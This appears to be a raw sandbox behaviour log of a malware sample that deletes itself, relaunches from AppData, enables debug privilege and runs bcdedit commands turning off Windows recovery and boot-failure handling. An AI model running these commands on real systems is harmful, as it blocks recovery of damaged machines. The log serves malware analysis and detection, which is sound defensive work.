- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 34675
- mode: setval
- sequenceNumber: 113
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 34675
- sequenceNumber: 114
- value: \Sessions\1\BaseNamedObjects\ZonesLockedCacheCounterMutex
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 34676
- mode: deleteval
- sequenceNumber: 115
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 34676
- mode: deleteval
- sequenceNumber: 116
- value: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 34676
- mode: deleteval
- sequenceNumber: 117
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 34676
- mode: deleteval
- sequenceNumber: 118
- value: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 34676
- mode: setval
- sequenceNumber: 119
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000000
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 34676
- mode: setval
- sequenceNumber: 120
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- folder:
- timestamp: 34728
- mode: open
- sequenceNumber: 121
- value: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x200000
- apicall:
- timestamp: 34733
- sequenceNumber: 122
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x77179cce
- params:
- param (id:1): 0x29ef6cc
- param (id:2): 260
- process:
- timestamp: 34737
- mode: started
- sequenceNumber: 123
- value: C:\Windows\SysWOW64\cmd.exe
- pid: 2400
- ppid: 2540
- parentname: C:\Users\Administrator\AppData\Local\Temp\73.exe
- cmdline: "C:\Windows\system32\cmd.exe" /c DEL C:\Users\ADMINI~1\AppData\Local\Temp\73.exe
- filesize: 302592
- md5sum: ad7b9c14083b52bc532fba5948342b98
- sha1sum: ee8cbf12d87c4d388f09b4f69bed2e91682920b5
- ads:
- fid (ads:): 281474976780679
- file:
- timestamp: 34743
- mode: failed
- sequenceNumber: 124
- value: C:\Windows\SysWOW64\UI\SWDRM.DLL
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 34758
- mode: failed
- sequenceNumber: 125
- value: C:\Windows\System32\WOW64LOG.DLL
- processinfo:
- tainted: true
- pid: 2400
- imagepath: C:\Windows\SysWOW64\cmd.exe
- md5sum: ad7b9c14083b52bc532fba5948342b98
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- process:
- timestamp: 34762
- mode: terminated
- sequenceNumber: 126
- value: C:\Users\Administrator\AppData\Local\Temp\73.exe
- pid: 2540
- ppid: 2312
- parentname: C:\Users\Administrator\AppData\Local\Temp\73.exe
- cmdline: N/A
- ads:
- fid (ads:): 3377699720611042
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 127
- timestamp: 34834
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 2400
- imagepath: C:\Windows\SysWOW64\cmd.exe
- md5sum: ad7b9c14083b52bc532fba5948342b98
- file:
- timestamp: 34864
- mode: delete
- sequenceNumber: 128
- value: C:\Users\Administrator\AppData\Local\Temp\73.exe
- filesize: 364544
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
- processinfo:
- tainted: true
- pid: 2400
- imagepath: C:\Windows\SysWOW64\cmd.exe
- md5sum: ad7b9c14083b52bc532fba5948342b98
- ads:
- fid (ads:): 3377699720611042
- ntstatus: 0x0
- CreateOptions: 0x0
- PE:
- InspectionType: Ext
- malicious-alert:
- classtype: Self-Delete
- weight: 0
- ruleid: 1712 : Self deletion using batch file ; Process deleting itself using a batch file
- msg: Process deleting itself using a batch file
- display-msg: Self deletion using batch file
- malicious-alert:
- classtype: Self-Delete
- weight: 0
- ruleid: 1701 : Root process deleted ; Process deleting itself
- msg: Process deleting itself
- display-msg: Root process deleted
- process:
- timestamp: 34873
- mode: terminated
- sequenceNumber: 129
- value: C:\Windows\SysWOW64\cmd.exe
- pid: 2400
- ppid: 2540
- parentname: C:\Users\Administrator\AppData\Local\Temp\73.exe
- cmdline: N/A
- ads:
- fid (ads:): 281474976780679
- process:
- timestamp: 35056
- mode: started
- sequenceNumber: 130
- value: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- pid: 1648
- ppid: 2824
- parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- cmdline: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- filesize: 364544
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
- ads:
- fid (ads:): 3096224743903578
- file:
- timestamp: 35079
- mode: failed
- sequenceNumber: 131
- value: C:\Windows\System32\WOW64LOG.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 35105
- mode: failed
- sequenceNumber: 132
- value: C:\Users\Administrator\AppData\Roaming\MPR.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- process:
- timestamp: 35104
- mode: terminated
- sequenceNumber: 133
- value: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- pid: 2824
- ppid: 2540
- parentname: C:\Users\Administrator\AppData\Local\Temp\73.exe
- cmdline: N/A
- ads:
- fid (ads:): 3096224743903578
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 134
- timestamp: 35115
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 35123
- mode: failed
- sequenceNumber: 135
- value: C:\Windows\SysWOW64\RPCSS.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 35122
- sequenceNumber: 136
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 35126
- sequenceNumber: 137
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 35147
- sequenceNumber: 138
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 35153
- sequenceNumber: 139
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 35163
- sequenceNumber: 140
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 35178
- sequenceNumber: 141
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 35183
- sequenceNumber: 142
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 35208
- sequenceNumber: 143
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 35212
- sequenceNumber: 144
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 35226
- sequenceNumber: 145
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x7732f96e
- params:
- param (id:1): 0x77396420
- param (id:2): 260
- mutex:
- timestamp: 35227
- sequenceNumber: 146
- value: \Sessions\1\BaseNamedObjects\DBWinMutex
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 35234
- sequenceNumber: 147
- value: \Sessions\1\BaseNamedObjects\AMResourceMutex3
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 35242
- mode: failed
- sequenceNumber: 148
- value: C:\Users\Administrator\AppData\Roaming\DWMAPI.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 35247
- mode: failed
- sequenceNumber: 149
- value: C:\Users\Administrator\AppData\Roaming\MSVFW32.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 35257
- mode: failed
- sequenceNumber: 150
- value: C:\Users\Administrator\AppData\Roaming\PROFAPI.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 35256
- sequenceNumber: 151
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: ntdll.dll
- apiname: NtAdjustPrivilegesToken
- address: 0x7584ca4f
- params:
- param (id:1): SeDebugPrivilege
- param (id:2): Enabled
- apicall:
- timestamp: 35256
- sequenceNumber: 152
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: advapi32.dll
- apiname: GetTokenInformation
- address: 0x0041e684
- params:
- param (id:1): 0x1a0
- param (id:2): 0x19
- apicall:
- timestamp: 35256
- sequenceNumber: 153
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: advapi32.dll
- apiname: GetTokenInformation
- address: 0x0041e6c6
- params:
- param (id:1): 0x1a0
- param (id:2): 0x19
- apicall:
- timestamp: 35257
- sequenceNumber: 154
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 35266
- sequenceNumber: 155
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 35275
- sequenceNumber: 156
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 35288
- sequenceNumber: 157
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 35292
- sequenceNumber: 158
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- mutex:
- timestamp: 35349
- sequenceNumber: 159
- value: \Sessions\1\BaseNamedObjects\78456214324124
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 35354
- mode: failed
- sequenceNumber: 160
- value: C:\Users\Administrator\AppData\Roaming\BCDEDIT.EXE
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 35359
- mode: failed
- sequenceNumber: 161
- value: C:\Users\ADMINI~1\AppData\Local\Temp\bcdedit.exe
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- process:
- timestamp: 35468
- mode: started
- sequenceNumber: 162
- value: C:\Windows\System32\bcdedit.exe
- pid: 2804
- ppid: 1648
- parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- cmdline: bcdedit.exe /set {current} bootems off
- filesize: 346112
- md5sum: 780836bb63852990382df27de7fefd20
- sha1sum: 6feedabbc6576a4bdc68935677b7a01f130b98f2
- ads:
- fid (ads:): 281474976780578
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 163
- timestamp: 35512
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 2804
- imagepath: C:\Windows\System32\bcdedit.exe
- md5sum: 780836bb63852990382df27de7fefd20
- regkey:
- timestamp: 35622
- mode: added
- sequenceNumber: 164
- value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000020
- processinfo:
- pid: 2804
- imagepath: C:\Windows\System32\bcdedit.exe
- md5sum: 780836bb63852990382df27de7fefd20
- regkey:
- timestamp: 35623
- mode: setval
- sequenceNumber: 165
- value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000020\"Element" = 00
- processinfo:
- pid: 2804
- imagepath: C:\Windows\System32\bcdedit.exe
- md5sum: 780836bb63852990382df27de7fefd20
- process:
- timestamp: 35634
- mode: terminated
- sequenceNumber: 166
- value: C:\Windows\System32\bcdedit.exe
- pid: 2804
- ppid: 1648
- parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- cmdline: N/A
- ads:
- fid (ads:): 281474976780578
- apicall:
- timestamp: 35638
- sequenceNumber: 167
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041dca8
- params:
- param (id:1): 1000
- process:
- timestamp: 36464
- mode: started
- sequenceNumber: 168
- value: C:\Windows\System32\bcdedit.exe
- pid: 2520
- ppid: 1648
- parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- cmdline: bcdedit.exe /set {current} advancedoptions off
- filesize: 346112
- md5sum: 780836bb63852990382df27de7fefd20
- sha1sum: 6feedabbc6576a4bdc68935677b7a01f130b98f2
- ads:
- fid (ads:): 281474976780578
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 169
- timestamp: 36505
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 2520
- imagepath: C:\Windows\System32\bcdedit.exe
- md5sum: 780836bb63852990382df27de7fefd20
- regkey:
- timestamp: 36511
- mode: added
- sequenceNumber: 170
- value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000040
- processinfo:
- pid: 2520
- imagepath: C:\Windows\System32\bcdedit.exe
- md5sum: 780836bb63852990382df27de7fefd20
- regkey:
- timestamp: 36514
- mode: setval
- sequenceNumber: 171
- value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000040\"Element" = 00
- processinfo:
- pid: 2520
- imagepath: C:\Windows\System32\bcdedit.exe
- md5sum: 780836bb63852990382df27de7fefd20
- process:
- timestamp: 36522
- mode: terminated
- sequenceNumber: 172
- value: C:\Windows\System32\bcdedit.exe
- pid: 2520
- ppid: 1648
- parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- cmdline: N/A
- ads:
- fid (ads:): 281474976780578
- apicall:
- timestamp: 36527
- sequenceNumber: 173
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041dca8
- params:
- param (id:1): 1000
- process:
- timestamp: 37329
- mode: started
- sequenceNumber: 174
- value: C:\Windows\System32\bcdedit.exe
- pid: 2616
- ppid: 1648
- parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- cmdline: bcdedit.exe /set {current} optionsedit off
- filesize: 346112
- md5sum: 780836bb63852990382df27de7fefd20
- sha1sum: 6feedabbc6576a4bdc68935677b7a01f130b98f2
- ads:
- fid (ads:): 281474976780578
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 175
- timestamp: 37373
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 2616
- imagepath: C:\Windows\System32\bcdedit.exe
- md5sum: 780836bb63852990382df27de7fefd20
- regkey:
- timestamp: 37380
- mode: added
- sequenceNumber: 176
- value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000041
- processinfo:
- pid: 2616
- imagepath: C:\Windows\System32\bcdedit.exe
- md5sum: 780836bb63852990382df27de7fefd20
- regkey:
- timestamp: 37380
- mode: setval
- sequenceNumber: 177
- value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000041\"Element" = 00
- processinfo:
- pid: 2616
- imagepath: C:\Windows\System32\bcdedit.exe
- md5sum: 780836bb63852990382df27de7fefd20
- process:
- timestamp: 37392
- mode: terminated
- sequenceNumber: 178
- value: C:\Windows\System32\bcdedit.exe
- pid: 2616
- ppid: 1648
- parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- cmdline: N/A
- ads:
- fid (ads:): 281474976780578
- apicall:
- timestamp: 37398
- sequenceNumber: 179
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041dca8
- params:
- param (id:1): 1000
- process:
- timestamp: 38214
- mode: started
- sequenceNumber: 180
- value: C:\Windows\System32\bcdedit.exe
- pid: 2792
- ppid: 1648
- parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- cmdline: bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
- filesize: 346112
- md5sum: 780836bb63852990382df27de7fefd20
- sha1sum: 6feedabbc6576a4bdc68935677b7a01f130b98f2
- ads:
- fid (ads:): 281474976780578
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 181
- timestamp: 38257
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 2792
- imagepath: C:\Windows\System32\bcdedit.exe
- md5sum: 780836bb63852990382df27de7fefd20
- regkey:
- timestamp: 38263
- mode: added
- sequenceNumber: 182
- value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\250000e0
- processinfo:
- pid: 2792
- imagepath: C:\Windows\System32\bcdedit.exe
- md5sum: 780836bb63852990382df27de7fefd20
- regkey:
- timestamp: 38263
- mode: setval
- sequenceNumber: 183
- value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\250000e0\"Element" = 01 00 00 00 00 00 00 00
- processinfo:
- pid: 2792
- imagepath: C:\Windows\System32\bcdedit.exe
- md5sum: 780836bb63852990382df27de7fefd20
- process:
- timestamp: 38275
- mode: terminated
- sequenceNumber: 184
- value: C:\Windows\System32\bcdedit.exe
- pid: 2792
- ppid: 1648
- parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- cmdline: N/A
- ads:
- fid (ads:): 281474976780578
- apicall:
- timestamp: 38279
- sequenceNumber: 185
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041dca8
- params:
- param (id:1): 1000
- process:
- timestamp: 39092
- mode: started
- sequenceNumber: 186
- value: C:\Windows\System32\bcdedit.exe
- pid: 2976
- ppid: 1648
- parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- cmdline: bcdedit.exe /set {current} recoveryenabled off
- filesize: 346112
- md5sum: 780836bb63852990382df27de7fefd20
- sha1sum: 6feedabbc6576a4bdc68935677b7a01f130b98f2
- ads:
- fid (ads:): 281474976780578
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 187
- timestamp: 39136
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 2976
- imagepath: C:\Windows\System32\bcdedit.exe
- md5sum: 780836bb63852990382df27de7fefd20
- regkey:
- timestamp: 39144
- mode: setval
- sequenceNumber: 188
- value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000009\"Element" = 00
- processinfo:
- pid: 2976
- imagepath: C:\Windows\System32\bcdedit.exe
- md5sum: 780836bb63852990382df27de7fefd20
- process:
- timestamp: 39153
- mode: terminated
- sequenceNumber: 189
- value: C:\Windows\System32\bcdedit.exe
- pid: 2976
- ppid: 1648
- parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- cmdline: N/A
- ads:
- fid (ads:): 281474976780578
- apicall:
- timestamp: 39154
- sequenceNumber: 190
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041dca8
- params:
- param (id:1): 1000
- regkey:
- timestamp: 39932
- mode: added
- sequenceNumber: 191
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\zsys\
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 39937
- mode: failed
- sequenceNumber: 192
- value: C:\Users\Administrator\AppData\Roaming\NETAPI32.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 40008
- mode: failed
- sequenceNumber: 193
- value: C:\Users\Administrator\AppData\Roaming\NETUTILS.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 40028
- mode: failed
- sequenceNumber: 194
- value: C:\Users\Administrator\AppData\Roaming\SRVCLI.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
